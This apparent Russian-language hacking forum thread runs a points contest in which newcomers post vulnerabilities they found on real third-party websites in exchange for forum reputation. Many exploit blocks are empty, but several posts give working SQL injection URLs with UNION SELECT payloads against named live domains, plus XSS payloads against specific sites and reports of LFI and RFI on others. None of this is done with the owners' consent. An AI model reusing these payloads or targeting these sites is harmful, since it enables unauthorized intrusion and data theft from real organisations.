![]() |
Правила:
Ваша задача найти уязвимости в веб-приложениях. Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ). Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться. За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua). В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например: Цитата:
Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ Типы уязвимостей:
|
Буду первым. Если что не так подправьте
Site: dkcity.com Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code: |
Цитата:
P. S. активнее, ребят |
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
|
Цитата:
Цитата:
|
Да, тулзой кручу.
Сайт: theatreinchicago.com Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code: |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code:Уязвимость: SQL Injection Эксплоит: Код:
Code: |
Сайт: www.justintime.in
Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code: |
Цитата:
Цитата:
|
Сайт: hexonline.co.uk
Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code:Уязвимость: SQLi Эксплоит: Код:
Code: |
Сайт: www.cobranet.org/about.php?id=1
Уязвимость: SQLi Эксплоит: http://www.cobranet.org/about.php?id=9999999 union select 1,2,3,version(),5,6 -- Сайт: http://www.raahauges.com/view-news.php?id=8 Уязвимость: SQLi Эксплоит: http://www.raahauges.com/view-news.php?id=null union select 1,2,@@Version,4,5 -- |
Сайт: http://www.yd1688.com
Уязвимость: SQL Injection Эксплоит: Код:
Code: |
Цитата:
Цитата:
|
Cайт:http://www.cygnethome.com/
Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость: Эксплойт: Код:
Code: |
Цитата:
|
PHP код:
|
Цитата:
Искал через софт ! |
Цитата:
Код:
Code:Нашли на 473 строке Код:
Code:Код:
Code: |
Цитата:
|
Сайт:http://www.cqtailian.com/
Уязвимость:SQLi Эксплойт: Код:
Code: |
Цитата:
|
Сайт: http://jithubhq.microbold.net/tutori...ials.php?id=11
Уязвимость: SQLi Эксплойт: http://jithubhq.microbold.net/tutori...als.php?id=-11 UNION SELECT @@Version,2,3,4 -- |
Сайт:http:www.brzozo.com
Уязвимость:Local File Reading Эксплойт: Код:
Code: |
Цитата:
|
Сайт:www.stateofemergencyltd.com
Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code:Уязвимость:SQLi Эксплойт: Код:
Code: |
Сайт: http://www.karnaticlabrecords.com/artists.php?id=32
Уязвимость: SQLi Эксплойт: http://www.karnaticlabrecords.com/a...CAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) |
всем добавил. sqli из паблика не зачтены.
|
для тех, кто уже прошел (на данный момент это только @3nvY). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей.
|
Сайт: hfboapps.ucr.edu
Уязвимость: LFI Эксплойт: Код:
Code:Уязвимость: LFI Эксплойт: Код:
Code:Уязвимость: RFI Эксплойт: Код:
Code: |
Цитата:
|
1)Сайт: http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi Эксплойт: http://www.felixfilm.se/film.php?id=...,6,7,8,9,10 -- 2)Сайт: http://prontowash.com/usa/location.php?id=2 Уязвимость: SQLi Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15-- 3)Сайт: http://www.comtecwash.com/photos.php?id=1 Уязвимость: SQLi Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10-- 4)Сайт: http://odessa-life.od.ua Уязвимость: XSS Эксплойт: http://odessa-life.od.ua/gue/search P.S В поиске: alert('1') 5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news Уязвимость: SQLi Эксплойт: http://mapexpert.com.ua/index_ru.php...--+&table=news P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru') 6)Сайт: http://prokudin-gorskiy.ru Уязвимость: XSS Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru' ) |
Сайт: www.walkandtrain.com
Уязвимость: RFI Эксплоит: Код:
Code:Уязвимость: RFI Эксплоит: Код:
Code: |
Цитата:
|
Цитата:
|
Цитата:
|
| Время: 19:11 |